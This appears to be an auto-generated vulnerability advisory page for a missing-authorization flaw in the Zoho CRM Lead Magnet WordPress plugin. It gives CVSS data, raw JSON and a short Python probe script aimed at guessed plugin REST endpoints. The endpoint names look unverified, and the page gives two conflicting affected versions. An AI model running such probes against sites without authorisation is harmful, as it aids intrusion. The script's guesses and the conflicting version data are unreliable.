Security Vulnerability Report
中文
CVE-2026-24595 CVSS 5.4 MEDIUM

CVE-2026-24595

Published: 2026-01-23 15:16:18
Last Modified: 2026-04-28 15:16:18

Description

Missing Authorization vulnerability in zohocrm Zoho CRM Lead Magnet zoho-crm-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zoho CRM Lead Magnet: from n/a through <= 1.8.1.9.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Zoho CRM Lead Magnet (zoho-crm-forms) <= 1.8.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24595 PoC - Zoho CRM Lead Magnet Authorization Bypass # Target: WordPress site with vulnerable zoho-crm-forms plugin (<=1.8.1.9) import requests import sys def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2026-24595 Missing Authorization in Zoho CRM Lead Magnet plugin """ # Common WordPress AJAX endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Common REST API endpoint rest_endpoint = f"{target_url}/wp-json/wp/v2/" # Vulnerable plugin endpoints to test vulnerable_endpoints = [ "zoho-crm-forms/v1/leads", "zoho-crm/v1/config", "zoho-crm-forms/v1/settings" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-24595 - Missing Authorization in zoho-crm-forms") # Test with low-privilege user session (simulated) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } # If you have a low-privilege cookie, use it here # cookies = {"wordpress_logged_in_xxx": "user_session_cookie"} for endpoint in vulnerable_endpoints: url = f"{target_url}/wp-json/{endpoint}" print(f"\n[*] Testing endpoint: {url}") try: response = requests.get(url, headers=headers, timeout=10) if response.status_code == 200: print(f"[!] VULNERABLE: Endpoint returned 200 OK") print(f"[!] Response preview: {response.text[:200]}") elif response.status_code == 401: print(f"[*] Protected: Endpoint requires authentication") elif response.status_code == 403: print(f"[*] Forbidden: Access denied") else: print(f"[*] Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") print("\n[*] Note: Manual verification recommended for accurate results") if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] check_vulnerability(target) else: print("Usage: python cve-2026-24595.py <target_url>") print("Example: python cve-2026-24595.py http://example.com")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24595", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:17.567", "lastModified": "2026-04-28T15:16:17.817", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in zohocrm Zoho CRM Lead Magnet zoho-crm-forms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Zoho CRM Lead Magnet: from n/a through <= 1.8.1.9."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en zohocrm Zoho CRM Lead Magnet zoho-crm-forms permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Zoho CRM Lead Magnet: desde n/a hasta &lt;= 1.8.1.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/zoho-crm-forms/vulnerability/wordpress-zoho-crm-lead-magnet-plugin-1-8-1-5-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}